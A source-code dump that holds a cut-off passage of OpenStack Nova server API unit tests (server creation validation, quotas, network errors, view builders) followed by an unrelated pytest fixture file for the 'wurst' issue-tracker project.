self.req.body = jsonutils.dumps(self.body)
res = self.controller.create(self.req, body=self.body).obj
server = res['server']
self._check_admin_password_missing(server)
self.assertEqual(FAKE_UUID, server['id'])
def test_create_instance_name_too_long(self):
# proper local hrefs must start with 'http://localhost/v3/'
image_href = 'http://localhost/v2/images/%s' % self.image_uuid
self.body['server']['name'] = 'X' * 256
self.body['server']['imageRef'] = image_href
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(exception.ValidationError, self.controller.create,
self.req, body=self.body)
def test_create_instance_name_all_blank_spaces(self):
# proper local hrefs must start with 'http://localhost/v2/'
image_uuid = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
image_href = 'http://localhost/v3/images/%s' % image_uuid
flavor_ref = 'http://localhost/flavors/3'
body = {
'server': {
'name': ' ' * 64,
'imageRef': image_href,
'flavorRef': flavor_ref,
'metadata': {
'hello': 'world',
'open': 'stack',
},
},
}
req = fakes.HTTPRequest.blank('/v3/servers')
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(exception.ValidationError,
self.controller.create, req, body=body)
def test_create_instance(self):
# proper local hrefs must start with 'http://localhost/v3/'
image_href = 'http://localhost/v2/images/%s' % self.image_uuid
self.body['server']['imageRef'] = image_href
self.req.body = jsonutils.dumps(self.body)
res = self.controller.create(self.req, body=self.body).obj
server = res['server']
self._check_admin_password_len(server)
self.assertEqual(FAKE_UUID, server['id'])
def test_create_instance_extension_create_exception(self):
def fake_keypair_server_create(self, server_dict,
create_kwargs):
raise KeyError
self.stubs.Set(keypairs.Keypairs, 'server_create',
fake_keypair_server_create)
# proper local hrefs must start with 'http://localhost/v3/'
image_uuid = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
image_href = 'http://localhost/v3/images/%s' % image_uuid
flavor_ref = 'http://localhost/123/flavors/3'
body = {
'server': {
'name': 'server_test',
'imageRef': image_href,
'flavorRef': flavor_ref,
'metadata': {
'hello': 'world',
'open': 'stack',
},
},
}
req = fakes.HTTPRequestV3.blank('/servers')
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPInternalServerError,
self.controller.create, req, body=body)
def test_create_instance_pass_disabled(self):
self.flags(enable_instance_password=False)
# proper local hrefs must start with 'http://localhost/v3/'
image_href = 'http://localhost/v2/images/%s' % self.image_uuid
self.body['server']['imageRef'] = image_href
self.req.body = jsonutils.dumps(self.body)
res = self.controller.create(self.req, body=self.body).obj
server = res['server']
self._check_admin_password_missing(server)
self.assertEqual(FAKE_UUID, server['id'])
def test_create_instance_too_much_metadata(self):
self.flags(quota_metadata_items=1)
image_href = 'http://localhost/v2/images/%s' % self.image_uuid
self.body['server']['imageRef'] = image_href
self.body['server']['metadata']['vote'] = 'fiddletown'
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(webob.exc.HTTPForbidden,
self.controller.create, self.req, body=self.body)
def test_create_instance_metadata_key_too_long(self):
self.flags(quota_metadata_items=1)
image_href = 'http://localhost/v2/images/%s' % self.image_uuid
self.body['server']['imageRef'] = image_href
self.body['server']['metadata'] = {('a' * 260): '12345'}
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(exception.ValidationError,
self.controller.create, self.req, body=self.body)
def test_create_instance_metadata_value_too_long(self):
self.flags(quota_metadata_items=1)
image_href = 'http://localhost/v2/images/%s' % self.image_uuid
self.body['server']['imageRef'] = image_href
self.body['server']['metadata'] = {'key1': ('a' * 260)}
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(exception.ValidationError,
self.controller.create, self.req, body=self.body)
def test_create_instance_metadata_key_blank(self):
self.flags(quota_metadata_items=1)
image_href = 'http://localhost/v2/images/%s' % self.image_uuid
self.body['server']['imageRef'] = image_href
self.body['server']['metadata'] = {'': 'abcd'}
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(exception.ValidationError,
self.controller.create, self.req, body=self.body)
def test_create_instance_metadata_not_dict(self):
self.flags(quota_metadata_items=1)
image_href = 'http://localhost/v2/images/%s' % self.image_uuid
self.body['server']['imageRef'] = image_href
self.body['server']['metadata'] = 'string'
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(exception.ValidationError,
self.controller.create, self.req, body=self.body)
def test_create_instance_metadata_key_not_string(self):
self.flags(quota_metadata_items=1)
image_href = 'http://localhost/v2/images/%s' % self.image_uuid
self.body['server']['imageRef'] = image_href
self.body['server']['metadata'] = {1: 'test'}
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(exception.ValidationError,
self.controller.create, self.req, body=self.body)
def test_create_instance_metadata_value_not_string(self):
self.flags(quota_metadata_items=1)
image_href = 'http://localhost/v2/images/%s' % self.image_uuid
self.body['server']['imageRef'] = image_href
self.body['server']['metadata'] = {'test': ['a', 'list']}
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(exception.ValidationError,
self.controller.create, self.req, body=self.body)
def test_create_user_data_malformed_bad_request(self):
params = {'user_data': 'u1234'}
self.assertRaises(exception.ValidationError,
self._test_create_extra, params)
def test_create_instance_invalid_key_name(self):
image_href = 'http://localhost/v2/images/2'
self.body['server']['imageRef'] = image_href
self.body['server']['key_name'] = 'nonexistentkey'
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, self.req, body=self.body)
def test_create_instance_valid_key_name(self):
self.body['server']['key_name'] = 'key'
self.req.body = jsonutils.dumps(self.body)
res = self.controller.create(self.req, body=self.body).obj
self.assertEqual(FAKE_UUID, res["server"]["id"])
self._check_admin_password_len(res["server"])
def test_create_instance_invalid_flavor_href(self):
image_href = 'http://localhost/v2/images/2'
flavor_ref = 'http://localhost/v2/flavors/asdf'
self.body['server']['imageRef'] = image_href
self.body['server']['flavorRef'] = flavor_ref
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, self.req, body=self.body)
def test_create_instance_invalid_flavor_id_int(self):
image_href = 'http://localhost/v2/images/2'
flavor_ref = -1
self.body['server']['imageRef'] = image_href
self.body['server']['flavorRef'] = flavor_ref
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, self.req, body=self.body)
def test_create_instance_bad_flavor_href(self):
image_href = 'http://localhost/v2/images/2'
flavor_ref = 'http://localhost/v2/flavors/17'
self.body['server']['imageRef'] = image_href
self.body['server']['flavorRef'] = flavor_ref
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, self.req, body=self.body)
def test_create_instance_bad_href(self):
image_href = 'asdf'
self.body['server']['imageRef'] = image_href
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, self.req, body=self.body)
def test_create_instance_local_href(self):
self.req.body = jsonutils.dumps(self.body)
res = self.controller.create(self.req, body=self.body).obj
server = res['server']
self.assertEqual(FAKE_UUID, server['id'])
def test_create_instance_admin_password(self):
self.body['server']['flavorRef'] = 3
self.body['server']['adminPass'] = 'testpass'
self.req.body = jsonutils.dumps(self.body)
res = self.controller.create(self.req, body=self.body).obj
server = res['server']
self.assertEqual(server['adminPass'],
self.body['server']['adminPass'])
def test_create_instance_admin_password_pass_disabled(self):
self.flags(enable_instance_password=False)
self.body['server']['flavorRef'] = 3
self.body['server']['adminPass'] = 'testpass'
self.req.body = jsonutils.dumps(self.body)
res = self.controller.create(self.req, body=self.body).obj
self.assertIn('server', res)
self.assertIn('adminPass', self.body['server'])
def test_create_instance_admin_password_empty(self):
self.body['server']['flavorRef'] = 3
self.body['server']['adminPass'] = ''
self.req.body = jsonutils.dumps(self.body)
# The fact that the action doesn't raise is enough validation
self.controller.create(self.req, body=self.body)
def test_create_location(self):
selfhref = 'http://localhost/v2/fake/servers/%s' % FAKE_UUID
self.req.body = jsonutils.dumps(self.body)
robj = self.controller.create(self.req, body=self.body)
self.assertEqual(robj['Location'], selfhref)
def _do_test_create_instance_above_quota(self, resource, allowed, quota,
expected_msg):
fakes.stub_out_instance_quota(self.stubs, allowed, quota, resource)
self.body['server']['flavorRef'] = 3
self.req.body = jsonutils.dumps(self.body)
try:
self.controller.create(self.req, body=self.body).obj['server']
self.fail('expected quota to be exceeded')
except webob.exc.HTTPForbidden as e:
self.assertEqual(e.explanation, expected_msg)
def test_create_instance_above_quota_instances(self):
msg = _('Quota exceeded for instances: Requested 1, but'
' already used 10 of 10 instances')
self._do_test_create_instance_above_quota('instances', 0, 10, msg)
def test_create_instance_above_quota_ram(self):
msg = _('Quota exceeded for ram: Requested 4096, but'
' already used 8192 of 10240 ram')
self._do_test_create_instance_above_quota('ram', 2048, 10 * 1024, msg)
def test_create_instance_above_quota_cores(self):
msg = _('Quota exceeded for cores: Requested 2, but'
' already used 9 of 10 cores')
self._do_test_create_instance_above_quota('cores', 1, 10, msg)
def test_create_instance_with_neutronv2_port_in_use(self):
network = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
port = 'eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee'
requested_networks = [{'uuid': network, 'port': port}]
params = {'networks': requested_networks}
def fake_create(*args, **kwargs):
raise exception.PortInUse(port_id=port)
self.stubs.Set(compute_api.API, 'create', fake_create)
self.assertRaises(webob.exc.HTTPConflict,
self._test_create_extra, params)
@mock.patch.object(compute_api.API, 'create')
def test_create_instance_public_network_non_admin(self, mock_create):
public_network_uuid = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
params = {'networks': [{'uuid': public_network_uuid}]}
self.req.body = jsonutils.dumps(self.body)
mock_create.side_effect = exception.ExternalNetworkAttachForbidden(
network_uuid=public_network_uuid)
self.assertRaises(webob.exc.HTTPForbidden,
self._test_create_extra, params)
@mock.patch.object(compute_api.API, 'create')
def test_create_multiple_instance_with_specified_ip_neutronv2(self,
_api_mock):
_api_mock.side_effect = exception.InvalidFixedIpAndMaxCountRequest(
reason="")
network = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
port = 'eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee'
address = '10.0.0.1'
requested_networks = [{'uuid': network, 'fixed_ip': address,
'port': port}]
params = {'networks': requested_networks}
self.body['server']['max_count'] = 2
self.assertRaises(webob.exc.HTTPBadRequest,
self._test_create_extra, params)
def test_create_multiple_instance_with_neutronv2_port(self):
network = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
port = 'eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee'
requested_networks = [{'uuid': network, 'port': port}]
params = {'networks': requested_networks}
self.body['server']['max_count'] = 2
def fake_create(*args, **kwargs):
msg = _("Unable to launch multiple instances with"
" a single configured port ID. Please launch your"
" instance one by one with different ports.")
raise exception.MultiplePortsNotApplicable(reason=msg)
self.stubs.Set(compute_api.API, 'create', fake_create)
self.assertRaises(webob.exc.HTTPBadRequest,
self._test_create_extra, params)
def test_create_instance_with_neturonv2_not_found_network(self):
network = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
requested_networks = [{'uuid': network}]
params = {'networks': requested_networks}
def fake_create(*args, **kwargs):
raise exception.NetworkNotFound(network_id=network)
self.stubs.Set(compute_api.API, 'create', fake_create)
self.assertRaises(webob.exc.HTTPBadRequest,
self._test_create_extra, params)
def test_create_instance_with_neutronv2_port_not_found(self):
network = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
port = 'eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee'
requested_networks = [{'uuid': network, 'port': port}]
params = {'networks': requested_networks}
def fake_create(*args, **kwargs):
raise exception.PortNotFound(port_id=port)
self.stubs.Set(compute_api.API, 'create', fake_create)
self.assertRaises(webob.exc.HTTPBadRequest,
self._test_create_extra, params)
@mock.patch.object(compute_api.API, 'create')
def test_create_instance_with_network_ambiguous(self, mock_create):
mock_create.side_effect = exception.NetworkAmbiguous()
self.assertRaises(webob.exc.HTTPConflict,
self._test_create_extra, {})
class ServersControllerCreateTestWithMock(test.TestCase):
image_uuid = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
flavor_ref = 'http://localhost/123/flavors/3'
def setUp(self):
"""Shared implementation for tests below that create instance."""
super(ServersControllerCreateTestWithMock, self).setUp()
self.flags(verbose=True,
enable_instance_password=True)
self.instance_cache_num = 0
self.instance_cache_by_id = {}
self.instance_cache_by_uuid = {}
ext_info = plugins.LoadedExtensionInfo()
self.controller = servers.ServersController(extension_info=ext_info)
self.body = {
'server': {
'name': 'server_test',
'imageRef': self.image_uuid,
'flavorRef': self.flavor_ref,
'metadata': {
'hello': 'world',
'open': 'stack',
},
},
}
self.req = fakes.HTTPRequest.blank('/fake/servers')
self.req.method = 'POST'
self.req.headers["content-type"] = "application/json"
def _test_create_extra(self, params, no_image=False):
self.body['server']['flavorRef'] = 2
if no_image:
self.body['server'].pop('imageRef', None)
self.body['server'].update(params)
self.req.body = jsonutils.dumps(self.body)
self.req.headers["content-type"] = "application/json"
self.controller.create(self.req, body=self.body).obj['server']
@mock.patch.object(compute_api.API, 'create')
def test_create_instance_with_neutronv2_fixed_ip_already_in_use(self,
create_mock):
network = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
address = '10.0.2.3'
requested_networks = [{'uuid': network, 'fixed_ip': address}]
params = {'networks': requested_networks}
create_mock.side_effect = exception.FixedIpAlreadyInUse(
address=address,
instance_uuid=network)
self.assertRaises(webob.exc.HTTPBadRequest,
self._test_create_extra, params)
self.assertEqual(1, len(create_mock.call_args_list))
class ServersViewBuilderTest(test.TestCase):
def setUp(self):
super(ServersViewBuilderTest, self).setUp()
CONF.set_override('host', 'localhost', group='glance')
self.flags(use_ipv6=True)
db_inst = fakes.stub_instance(
id=1,
image_ref="5",
uuid="deadbeef-feed-edee-beef-d0ea7beefedd",
display_name="test_server",
include_fake_metadata=False)
privates = ['172.19.0.1']
publics = ['192.168.0.3']
public6s = ['b33f::fdee:ddff:fecc:bbaa']
def nw_info(*args, **kwargs):
return [(None, {'label': 'public',
'ips': [dict(ip=ip) for ip in publics],
'ip6s': [dict(ip=ip) for ip in public6s]}),
(None, {'label': 'private',
'ips': [dict(ip=ip) for ip in privates]})]
def floaters(*args, **kwargs):
return []
fakes.stub_out_nw_api_get_instance_nw_info(self.stubs, nw_info)
fakes.stub_out_nw_api_get_floating_ips_by_fixed_address(self.stubs,
floaters)
self.uuid = db_inst['uuid']
self.view_builder = views.servers.ViewBuilderV3()
self.request = fakes.HTTPRequestV3.blank("")
self.request.context = context.RequestContext('fake', 'fake')
self.instance = fake_instance.fake_instance_obj(
self.request.context,
expected_attrs=instance_obj.INSTANCE_DEFAULT_FIELDS,
**db_inst)
def test_get_flavor_valid_instance_type(self):
flavor_bookmark = "http://localhost/flavors/1"
expected = {"id": "1",
"links": [{"rel": "bookmark",
"href": flavor_bookmark}]}
result = self.view_builder._get_flavor(self.request, self.instance)
self.assertEqual(result, expected)
def test_build_server(self):
self_link = "http://localhost/v3/servers/%s" % self.uuid
bookmark_link = "http://localhost/servers/%s" % self.uuid
expected_server = {
"server": {
"id": self.uuid,
"name": "test_server",
"links": [
{
"rel": "self",
"href": self_link,
},
{
"rel": "bookmark",
"href": bookmark_link,
},
],
}
}
output = self.view_builder.basic(self.request, self.instance)
self.assertThat(output, matchers.DictMatches(expected_server))
def test_build_server_with_project_id(self):
expected_server = {
"server": {
"id": self.uuid,
"name": "test_server",
"links": [
{
"rel": "self",
"href": "http://localhost/v3/servers/%s" %
self.uuid,
},
{
"rel": "bookmark",
"href": "http://localhost/servers/%s" % self.uuid,
},
],
}
}
output = self.view_builder.basic(self.request, self.instance)
self.assertThat(output, matchers.DictMatches(expected_server))
def test_build_server_detail(self):
image_bookmark = "http://localhost/images/5"
flavor_bookmark = "http://localhost/flavors/1"
self_link = "http://localhost/v3/servers/%s" % self.uuid
bookmark_link = "http://localhost/servers/%s" % self.uuid
expected_server = {
"server": {
"id": self.uuid,
"user_id": "fake_user",
"tenant_id": "fake_project",
"updated": "2010-11-11T11:00:00Z",
"created": "2010-10-10T12:00:00Z",
"progress": 0,
"name": "test_server",
"status": "BUILD",
"hostId": '',
"image": {
"id": "5",
"links": [
{
"rel": "bookmark",
"href": image_bookmark,
},
],
},
"flavor": {
"id": "1",
"links": [
{
"rel": "bookmark",
"href": flavor_bookmark,
},
],
},
"addresses": {
'test1': [
{'version': 4, 'addr': '192.168.1.100',
'type': 'fixed', 'mac_addr': 'aa:aa:aa:aa:aa:aa'},
{'version': 6, 'addr': '2001:db8:0:1::1',
'type': 'fixed', 'mac_addr': 'aa:aa:aa:aa:aa:aa'}
]
},
"metadata": {},
"links": [
{
"rel": "self",
"href": self_link,
},
{
"rel": "bookmark",
"href": bookmark_link,
},
],
}
}
output = self.view_builder.show(self.request, self.instance)
self.assertThat(output, matchers.DictMatches(expected_server))
def test_build_server_detail_with_fault(self):
self.instance['vm_state'] = vm_states.ERROR
self.instance['fault'] = fake_instance.fake_fault_obj(
self.request.context, self.uuid)
image_bookmark = "http://localhost/images/5"
flavor_bookmark = "http://localhost/flavors/1"
self_link = "http://localhost/v3/servers/%s" % self.uuid
bookmark_link = "http://localhost/servers/%s" % self.uuid
expected_server = {
"server": {
"id": self.uuid,
"user_id": "fake_user",
"tenant_id": "fake_project",
"updated": "2010-11-11T11:00:00Z",
"created": "2010-10-10T12:00:00Z",
"name": "test_server",
"status": "ERROR",
"hostId": '',
"image": {
"id": "5",
"links": [
{
"rel": "bookmark",
"href": image_bookmark,
},
],
},
"flavor": {
"id": "1",
"links": [
{
"rel": "bookmark",
"href": flavor_bookmark,
},
],
},
"addresses": {
'test1': [
{'version': 4, 'addr': '192.168.1.100',
'type': 'fixed', 'mac_addr': 'aa:aa:aa:aa:aa:aa'},
{'version': 6, 'addr': '2001:db8:0:1::1',
'type': 'fixed', 'mac_addr': 'aa:aa:aa:aa:aa:aa'}
]
},
"metadata": {},
"links": [
{
"rel": "self",
"href": self_link,
},
{
"rel": "bookmark",
"href": bookmark_link,
},
],
"fault": {
"code": 404,
"created": "2010-10-10T12:00:00Z",
"message": "HTTPNotFound",
"details": "Stock details for test",
},
}
}
self.request.context = context.RequestContext('fake', 'fake')
output = self.view_builder.show(self.request, self.instance)
self.assertThat(output, matchers.DictMatches(expected_server))
def test_build_server_detail_with_fault_that_has_been_deleted(self):
self.instance['deleted'] = 1
self.instance['vm_state'] = vm_states.ERROR
fault = fake_instance.fake_fault_obj(self.request.context,
self.uuid, code=500,
message="No valid host was found")
self.instance['fault'] = fault
expected_fault = {"code": 500,
"created": "2010-10-10T12:00:00Z",
"message": "No valid host was found"}
self.request.context = context.RequestContext('fake', 'fake')
output = self.view_builder.show(self.request, self.instance)
# Regardless of vm_state deleted servers sholud be DELETED
self.assertEqual("DELETED", output['server']['status'])
self.assertThat(output['server']['fault'],
matchers.DictMatches(expected_fault))
def test_build_server_detail_with_fault_no_details_not_admin(self):
self.instance['vm_state'] = vm_states.ERROR
self.instance['fault'] = fake_instance.fake_fault_obj(
self.request.context,
self.uuid,
code=500,
message='Error')
expected_fault = {"code": 500,
"created": "2010-10-10T12:00:00Z",
"message": "Error"}
self.request.context = context.RequestContext('fake', 'fake')
output = self.view_builder.show(self.request, self.instance)
self.assertThat(output['server']['fault'],
matchers.DictMatches(expected_fault))
def test_build_server_detail_with_fault_admin(self):
self.instance['vm_state'] = vm_states.ERROR
self.instance['fault'] = fake_instance.fake_fault_obj(
self.request.context,
self.uuid,
code=500,
message='Error')
expected_fault = {"code": 500,
"created": "2010-10-10T12:00:00Z",
"message": "Error",
'details': 'Stock details for test'}
self.request.environ['nova.context'].is_admin = True
output = self.view_builder.show(self.request, self.instance)
self.assertThat(output['server']['fault'],
matchers.DictMatches(expected_fault))
def test_build_server_detail_with_fault_no_details_admin(self):
self.instance['vm_state'] = vm_states.ERROR
self.instance['fault'] = fake_instance.fake_fault_obj(
self.request.context,
self.uuid,
code=500,
message='Error',
details='')
expected_fault = {"code": 500,
"created": "2010-10-10T12:00:00Z",
"message": "Error"}
self.request.environ['nova.context'].is_admin = True
output = self.view_builder.show(self.request, self.instance)
self.assertThat(output['server']['fault'],
matchers.DictMatches(expected_fault))
def test_build_server_detail_with_fault_but_active(self):
self.instance['vm_state'] = vm_states.ACTIVE
self.instance['progress'] = 100
self.instance['fault'] = fake_instance.fake_fault_obj(
self.request.context, self.uuid)
output = self.view_builder.show(self.request, self.instance)
self.assertNotIn('fault', output['server'])
def test_build_server_detail_active_status(self):
# set the power state of the instance to running
self.instance['vm_state'] = vm_states.ACTIVE
self.instance['progress'] = 100
image_bookmark = "http://localhost/images/5"
flavor_bookmark = "http://localhost/flavors/1"
self_link = "http://localhost/v3/servers/%s" % self.uuid
bookmark_link = "http://localhost/servers/%s" % self.uuid
expected_server = {
"server": {
"id": self.uuid,
"user_id": "fake_user",
"tenant_id": "fake_project",
"updated": "2010-11-11T11:00:00Z",
"created": "2010-10-10T12:00:00Z",
"progress": 100,
"name": "test_server",
"status": "ACTIVE",
"hostId": '',
"image": {
"id": "5",
"links": [
{
"rel": "bookmark",
"href": image_bookmark,
},
],
},
"flavor": {
"id": "1",
"links": [
{
"rel": "bookmark",
"href": flavor_bookmark,
},
],
},
"addresses": {
'test1': [
{'version': 4, 'addr': '192.168.1.100',
'type': 'fixed', 'mac_addr': 'aa:aa:aa:aa:aa:aa'},
{'version': 6, 'addr': '2001:db8:0:1::1',
'type': 'fixed', 'mac_addr': 'aa:aa:aa:aa:aa:aa'}
]
},
"metadata": {},
"links": [
{
"rel": "self",
"href": self_link,
},
{
"rel": "bookmark",
"href": bookmark_link,
},
],
}
}
output = self.view_builder.show(self.request, self.instance)
self.assertThat(output, matchers.DictMatches(expected_server))
def test_build_server_detail_with_metadata(self):
metadata = []
metadata.append(models.InstanceMetadata(key="Open", value="Stack"))
metadata = nova_utils.metadata_to_dict(metadata)
self.instance['metadata'] = metadata
image_bookmark = "http://localhost/images/5"
flavor_bookmark = "http://localhost/flavors/1"
self_link = "http://localhost/v3/servers/%s" % self.uuid
bookmark_link = "http://localhost/servers/%s" % self.uuid
expected_server = {
"server": {
"id": self.uuid,
"user_id": "fake_user",
"tenant_id": "fake_project",
"updated": "2010-11-11T11:00:00Z",
"created": "2010-10-10T12:00:00Z",
"progress": 0,
"name": "test_server",
"status": "BUILD",
"hostId": '',
"image": {
"id": "5",
"links": [
{
"rel": "bookmark",
"href": image_bookmark,
},
],
},
"flavor": {
"id": "1",
"links": [
{
"rel": "bookmark",
"href": flavor_bookmark,
},
],
},
"addresses": {
'test1': [
{'version': 4, 'addr': '192.168.1.100',
'type': 'fixed', 'mac_addr': 'aa:aa:aa:aa:aa:aa'},
{'version': 6, 'addr': '2001:db8:0:1::1',
'type': 'fixed', 'mac_addr': 'aa:aa:aa:aa:aa:aa'},
]
},
"metadata": {"Open": "Stack"},
"links": [
{
"rel": "self",
"href": self_link,
},
{
"rel": "bookmark",
"href": bookmark_link,
},
],
}
}
output = self.view_builder.show(self.request, self.instance)
self.assertThat(output, matchers.DictMatches(expected_server))
class ServersAllExtensionsTestCase(test.TestCase):
"""Servers tests using default API router with all extensions enabled.
The intent here is to catch cases where extensions end up throwing
an exception because of a malformed request before the core API
gets a chance to validate the request and return a 422 response.
For example, AccessIPsController extends servers.Controller::
| @wsgi.extends
| def create(self, req, resp_obj, body):
| context = req.environ['nova.context']
| if authorize(context) and 'server' in resp_obj.obj:
| resp_obj.attach(xml=AccessIPTemplate())
| server = resp_obj.obj['server']
| self._extend_server(req, server)
we want to ensure that the extension isn't barfing on an invalid
body.
"""
def setUp(self):
super(ServersAllExtensionsTestCase, self).setUp()
self.app = compute.APIRouterV3()
def test_create_missing_server(self):
# Test create with malformed body.
def fake_create(*args, **kwargs):
raise test.TestingException("Should not reach the compute API.")
self.stubs.Set(compute_api.API, 'create', fake_create)
req = fakes.HTTPRequestV3.blank('/servers')
req.method = 'POST'
req.content_type = 'application/json'
body = {'foo': {'a': 'b'}}
req.body = jsonutils.dumps(body)
res = req.get_response(self.app)
self.assertEqual(400, res.status_int)
def test_update_missing_server(self):
# Test update with malformed body.
def fake_update(*args, **kwargs):
raise test.TestingException("Should not reach the compute API.")
self.stubs.Set(compute_api.API, 'update', fake_update)
req = fakes.HTTPRequestV3.blank('/servers/1')
req.method = 'PUT'
req.content_type = 'application/json'
body = {'foo': {'a': 'b'}}
req.body = jsonutils.dumps(body)
res = req.get_response(self.app)
self.assertEqual(400, res.status_int)
class ServersInvalidRequestTestCase(test.TestCase):
"""Tests of places we throw 400 Bad Request from."""
def setUp(self):
super(ServersInvalidRequestTestCase, self).setUp()
ext_info = plugins.LoadedExtensionInfo()
self.controller = servers.ServersController(extension_info=ext_info)
def _invalid_server_create(self, body):
req = fakes.HTTPRequestV3.blank('/servers')
req.method = 'POST'
self.assertRaises(exception.ValidationError,
self.controller.create, req, body=body)
def test_create_server_no_body(self):
self._invalid_server_create(body=None)
def test_create_server_missing_server(self):
body = {'foo': {'a': 'b'}}
self._invalid_server_create(body=body)
def test_create_server_malformed_entity(self):
body = {'server': 'string'}
self._invalid_server_create(body=body)
def _unprocessable_server_update(self, body):
req = fakes.HTTPRequestV3.blank('/servers/%s' % FAKE_UUID)
req.method = 'PUT'
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, FAKE_UUID, body=body)
def test_update_server_no_body(self):
self._invalid_server_create(body=None)
def test_update_server_missing_server(self):
body = {'foo': {'a': 'b'}}
self._invalid_server_create(body=body)
def test_create_update_malformed_entity(self):
body = {'server': 'string'}
self._invalid_server_create(body=body)
class FakeExt(extensions.V3APIExtensionBase):
name = "AccessIPs"
alias = 'os-access-ips'
version = 1
def fake_extension_point(self, *args, **kwargs):
pass
def get_controller_extensions(self):
return []
def get_resources(self):
return []
class TestServersExtensionPoint(test.NoDBTestCase):
def setUp(self):
super(TestServersExtensionPoint, self).setUp()
CONF.set_override('extensions_whitelist', ['os-access-ips'],
'osapi_v3')
self.stubs.Set(access_ips, 'AccessIPs', FakeExt)
def _test_load_extension_point(self, name):
setattr(FakeExt, 'server_%s' % name,
FakeExt.fake_extension_point)
ext_info = plugins.LoadedExtensionInfo()
controller = servers.ServersController(extension_info=ext_info)
self.assertEqual(
'os-access-ips',
list(getattr(controller,
'%s_extension_manager' % name))[0].obj.alias)
delattr(FakeExt, 'server_%s' % name)
def test_load_update_extension_point(self):
self._test_load_extension_point('update')
def test_load_rebuild_extension_point(self):
self._test_load_extension_point('rebuild')
def test_load_create_extension_point(self):
self._test_load_extension_point('create')
class TestServersExtensionSchema(test.NoDBTestCase):
def setUp(self):
super(TestServersExtensionSchema, self).setUp()
CONF.set_override('extensions_whitelist', ['keypairs'], 'osapi_v3')
def _test_load_extension_schema(self, name):
setattr(FakeExt, 'get_server_%s_schema' % name,
FakeExt.fake_extension_point)
ext_info = plugins.LoadedExtensionInfo()
controller = servers.ServersController(extension_info=ext_info)
self.assertTrue(hasattr(controller, '%s_schema_manager' % name))
delattr(FakeExt, 'get_server_%s_schema' % name)
return getattr(controller, 'schema_server_%s' % name)
def test_load_create_extension_point(self):
# The expected is the schema combination of base and keypairs
# because of the above extensions_whitelist.
expected_schema = copy.deepcopy(servers_schema.base_create)
expected_schema['properties']['server']['properties'].update(
keypairs_schema.server_create)
actual_schema = self._test_load_extension_schema('create')
self.assertEqual(expected_schema, actual_schema)
def test_load_update_extension_point(self):
# keypair extension does not contain update_server() and
# here checks that any extension is not added to the schema.
expected_schema = copy.deepcopy(servers_schema.base_update)
actual_schema = self._test_load_extension_schema('update')
self.assertEqual(expected_schema, actual_schema)
def test_load_rebuild_extension_point(self):
# keypair extension does not contain rebuild_server() and
# here checks that any extension is not added to the schema.
expected_schema = copy.deepcopy(servers_schema.base_rebuild)
actual_schema = self._test_load_extension_schema('rebuild')
self.assertEqual(expected_schema, actual_schema)
| apache-2.0 | 2,637,198,558,954,699,000 | 40.595554 | 79 | 0.559654 | false |
kcsry/wurst | tests/conftest.py | 1 | 1702 | import os
import pytest
import toml
from rest_framework.test import APIClient
from six import StringIO
from wurst.core.consts import StatusCategory
from wurst.core.models import IssueType, Priority, Project, Status
from wurst.core.utils.schema_import import SchemaImporter
BASIC_SCHEMA_PATH = os.path.join(
os.path.dirname(__file__), "..", "wurst", "core", "schemata", "basic.toml"
)
BASIC_SCHEMA_DATA = toml.load(BASIC_SCHEMA_PATH)
@pytest.mark.django_db
@pytest.fixture
def basic_schema():
schi = SchemaImporter()
schi.stdout = StringIO()
schi.import_from_data(BASIC_SCHEMA_DATA)
return schi.objects
@pytest.mark.django_db
@pytest.fixture
def project():
return Project.objects.get_or_create(name="Test", slug="test", prefix="T-")[0]
@pytest.mark.django_db
@pytest.fixture
def task_type():
return IssueType.objects.get_or_create(name="Task", slug="task")[0]
@pytest.mark.django_db
@pytest.fixture
def normal_priority():
return Priority.objects.get_or_create(name="Normal", slug="normal")[0]
@pytest.mark.django_db
@pytest.fixture
def todo_status():
return Status.objects.get_or_create(name="To Do", slug="to-do")[0]
@pytest.mark.django_db
@pytest.fixture
def done_status():
return Status.objects.get_or_create(name="Done", slug="done", category=StatusCategory.DONE)[0]
@pytest.mark.django_db
@pytest.fixture
def closed_status():
return Status.objects.get_or_create(name="Closed", slug="closed", category=StatusCategory.CLOSED)[0]
@pytest.fixture()
def admin_api_client(admin_user):
api_client = APIClient()
api_client.login(username=admin_user.username, password="password")
api_client.user = admin_user
return api_client
| mit | 4,476,096,679,161,664,500 | 24.029412 | 104 | 0.727967 | false |
